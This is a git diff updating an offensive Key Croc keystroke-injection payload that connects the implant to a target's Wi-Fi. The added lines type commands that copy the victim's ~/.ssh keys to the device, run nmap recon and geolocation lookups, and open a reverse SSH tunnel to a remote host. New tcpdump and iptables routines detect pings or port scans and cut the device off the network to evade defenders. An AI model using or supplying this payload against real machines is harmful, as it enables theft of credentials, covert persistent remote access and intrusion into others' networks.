Update Croc_getonline.txt

minor changes
added  ICMP and Port Alerts

payloads/library/credentials/Croc_Getonline/Croc_getonline.txt

@@ -2,7 +2,7 @@
 # Description:     Attempt to connect Keycroc automatically to target wifi access point
 #                  Save to tools/wifipass.txt, tools/old_wifipass.txt & recon loot to /root/udisk/tools/Target_SSID.txt
 # Author:          spywill
-# Version:         4.1
+# Version:         4.2
 # Category:        Key Croc
 # Props:           Cribbit, Lodrix, potong, RootJunky, dark_pyrro
 
@@ -17,6 +17,7 @@
 #   getonline_P <-- MATCH word for entering ATTACKMODE HID SERIAL
 #   getonline_A <-- MATCH word for entering ATTACKMODE HID AUTO_ETHERNET
 #   getonline_X <-- MATCH word for Remove Croc_Getonline payload, contents and reboot
+#   getonline_T <-- MATCH word for Stopping ICMP/PORT alert
 
 MATCH (getonline_W|getonline_R|getonline_L|getonline_N|getonline_F|getonline_K|getonline_S|getonline_H|getonline_P|getonline_A|getonline_X)
 QUACK LOCK
@@ -40,11 +41,14 @@ known_ssid_password=EDIT_KNOWN_SSID_PASSWORD_HERE
 recon=off
 recon_loot=/root/udisk/tools/Target_SSID.txt
 
-#---> Edit Linux target password below
+alert=off
+alert_time=60
+
+#---> Edit target password below
 if [ -f ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered ]; then
 	target_password=$(sed '$!d' ~/udisk/tools/Croc_Pot/Croc_unlock.txt.filtered)
 else
-	target_password=ENTER_LINUX_PASSWORD_HERE
+	target_password=ENTER_TARGET_PASSWORD_HERE
 fi
 
 recon_scan() {
@@ -53,10 +57,16 @@ recon_scan() {
 			QUACK STRING "ipconfig /all | Out-File -Encoding UTF8 \"\$MOUNT_POINT\tools\Target_SSID.txt\""
 			QUACK ENTER
 			QUACK DELAY 2000
+			QUACK STRING "if (Test-Path -Path ~/.ssh) { \$destination = Join-Path -Path \$MOUNT_POINT -ChildPath \"tools\Target_SSH_KEY.txt\"; if (-not (Test-Path -Path \$destination)) { New-Item -ItemType Directory -Path \$destination | Out-Null }; Copy-Item -Path ~/.ssh\* -Destination \$destination } else { \$false }"
+			QUACK ENTER
+			QUACK DELAY 2000
 		elif [ "$LOOT" = "getonline_R" ] || [ "$LOOT" = "getonline_L" ]; then
 			QUACK STRING "ifconfig -a > \"\$MOUNT_POINT/tools/Target_SSID.txt\""
 			QUACK ENTER
 			QUACK DELAY 2000
+			QUACK STRING "[ -d ~/.ssh ] && cp -fr ~/.ssh/. \"\$MOUNT_POINT/tools/Target_SSH_KEY.txt\" || :"
+			QUACK ENTER
+			QUACK DELAY 2000
 		else
 			:
 		fi
@@ -103,6 +113,14 @@ CLEAN_UP() {
 	fi
 }
 
+calculate_network_range() {
+	ip_address=$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)
+	netmask=$(ifconfig wlan0 | grep -Eo 'Mask:([0-9]*\.){3}[0-9]*|netmask ([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*')
+	IFS=. read -r i1 i2 i3 i4 <<< "$ip_address"
+	IFS=. read -r m1 m2 m3 m4 <<< "$netmask"
+	network_range="$((i1 & m1)).$((i2 & m2)).$((i3 & m3)).0/24"
+}
+
 case $LOOT in
 	getonline_W)
 		ENTER_STORAGE
@@ -220,6 +238,22 @@ case $LOOT in
 		rm -f $recon_loot root/udisk/config.txt
 		apt -y remove sshpass
 		reboot --force
+		RESET_PAYLOAD
+;;
+	getonline_T)
+		if ps -p "$(sed -n 1p /tmp/port_pid.txt)" || ps -p "$(sed -n 1p /tmp/icmp_pid.txt)"; then
+			if ps -p "$(sed -n 1p /tmp/port_pid.txt)"; then
+				kill -9 "$(sed -n 1p /tmp/port_pid.txt)"
+			fi
+			if ps -p "$(sed -n 1p /tmp/icmp_pid.txt)"; then
+				kill -9 "$(sed -n 1p /tmp/icmp_pid.txt)"
+			fi
+			killall -9 tcpdump
+			sleep 1
+		else
+			:
+		fi
+		RESET_PAYLOAD
 ;;
 esac
 sleep 3
@@ -292,18 +326,13 @@ if : >/dev/tcp/8.8.8.8/53; then
 		QUACK ENTER
 	elif [ $option -eq 2 ]; then
 		status="$(dpkg-query -W --showformat='${db:Status-Status}' "sshpass" 2>&1)"
-		if [ ! $? = 0 ] || [ ! "$status" = installed ]; then
-			apt -y install sshpass
-		else
-			:
-		fi
+		[ $? = 0 ] || [ "$status" = installed ] && : || apt -y install sshpass
 		sleep 1
 		if nmap -sn "$remote_host_ip" | grep -q "Host is up"; then
-			cp -rp ~/.ssh ~/udisk/backup_ssh 2>/dev/null
-			rm -rf ~/.ssh 2>/dev/null
-			ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa
-			sshpass -p "$keycroc_password" ssh -o "StrictHostKeyChecking no" root@localhost "sshpass -p \"$remote_host_password\" ssh-copy-id -o \"StrictHostKeyChecking no\" -i ~/.ssh/id_rsa.pub $remote_user_name@$remote_host_ip"
+			[ -f ~/.ssh/id_rsa.pub ] && : || ssh-keygen -t rsa -N "" -f ~/.ssh/id_rsa
 			sleep 1
+			sshpass -p "$keycroc_password" ssh -o "StrictHostKeyChecking no" root@localhost "sshpass -p \"$remote_host_password\" ssh-copy-id -o \"StrictHostKeyChecking no\" -i ~/.ssh/id_rsa.pub $remote_user_name@$remote_host_ip"
+			sleep 3
 			ssh -o "StrictHostKeyChecking no" -fN -R $port:localhost:22 $remote_user_name@$remote_host_ip
 		else
 			LED R
@@ -324,10 +353,6 @@ else
 	LED R
 fi
 
-sleep 3
-LED OFF
-QUACK UNLOCK
-
 if [ "$recon" = "on" ]; then
 	LED C SLOW
 	echo -ne "\n\nCurrent SSID:\n\n" >> $recon_loot
@@ -337,28 +362,63 @@ if [ "$recon" = "on" ]; then
 	ip n | grep -Ei "reach|stale" | sed -r 's/\b(dev|lladdr)\b//g' >> $recon_loot
 	cat /etc/resolv.conf | grep nameserver >> $recon_loot
 
-	echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot
-	calculate_network_range() {
-		ip_address=$(ifconfig wlan0 | grep -Eo 'inet (addr:)?([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*')
-		netmask=$(ifconfig wlan0 | grep -Eo 'Mask:([0-9]*\.){3}[0-9]*|netmask ([0-9]*\.){3}[0-9]*' | grep -Eo '([0-9]*\.){3}[0-9]*')
-		IFS=. read -r i1 i2 i3 i4 <<< "$ip_address"
-		IFS=. read -r m1 m2 m3 m4 <<< "$netmask"
-		network_range="$((i1 & m1)).$((i2 & m2)).$((i3 & m3)).0/24"
-		echo "$network_range"
-	}
 	perform_nmap_scan() {
-		local network_range=$1
+		echo -ne "\n\nNmap with target: $network_range\n\n" >> $recon_loot
 		nmap -T4 -F $network_range >> $recon_loot
 	}
-	network_range=$(calculate_network_range)
-	perform_nmap_scan $network_range
+	calculate_network_range
+	perform_nmap_scan
 
 	echo -ne "\n\nPUBLIC IP: $(curl -Lsf --connect-timeout 2 --max-time 2 https://checkip.amazonaws.com)\n" >> $recon_loot
 	curl -Lsf --connect-timeout 2 --max-time 2 "http://ip-api.com/line?fields=country,regionName,city,isp" | { read -r country; read -r region; read -r city; read -r isp; echo "COUNTRY: $country"; echo "REGION: $region"; echo "CITY: $city"; echo "ISP: $isp"; } >> $recon_loot
 	echo -ne "\n\n" >> $recon_loot
-	LED OFF
 elif [ "$recon" = "off" ]; then
 	:
 else
 	:
 fi
+
+if [ "$alert" = "on" ]; then
+	icmp_alert() {
+		calculate_network_range
+		sleep 1
+		until (tcpdump -c 1 -n '((icmp and icmp[0]=8) or (udp and src net '$network_range' and (dst port 33434 or dst port 33534))) and not src host '$ip_address'' | grep -o "IP.*" | sed 's/id.*//g; s/length.*//g' | sed 's/IP/\n&/g'); do
+			:
+		done
+		LED R SLOW
+		iptables -F
+		iptables -A OUTPUT -p icmp --icmp-type any -j DROP
+		sleep $alert_time
+		iptables-restore < /root/udisk/tools/firewall-rules-backup.txt
+		LED B ; sleep 2 ; LED OFF
+		icmp_alert & echo -ne $! > /tmp/icmp_pid.txt
+	}
+	port_alert() {
+		ip_address=$(ifconfig wlan0 | grep "inet addr" | awk '{print $2}' | cut -c 6-)
+		file=/tmp/tcpdump.out
+		until (tcpdump -i wlan0 -c 20 'tcp[tcpflags] & (tcp-syn) != 0 and not src host '$ip_address'' -w $file -G 10); do
+			:
+		done
+		LED R SLOW
+		iptables -F
+		iptables -P INPUT DROP
+		iptables -P OUTPUT DROP
+		iptables -P FORWARD DROP
+		sleep $alert_time
+		iptables-restore < /root/udisk/tools/firewall-rules-backup.txt
+		LED B ; sleep 2 ; LED OFF
+		port_alert & echo -ne $! > /tmp/port_pid.txt
+	}
+	iptables-save > /root/udisk/tools/firewall-rules-backup.txt
+	icmp_alert & echo -ne $! > /tmp/icmp_pid.txt
+	port_alert & echo -ne $! > /tmp/port_pid.txt
+	LED B
+elif [ "$alert" = "off" ]; then
+	:
+else
+	:
+fi
+
+sleep 3
+LED OFF
+QUACK UNLOCK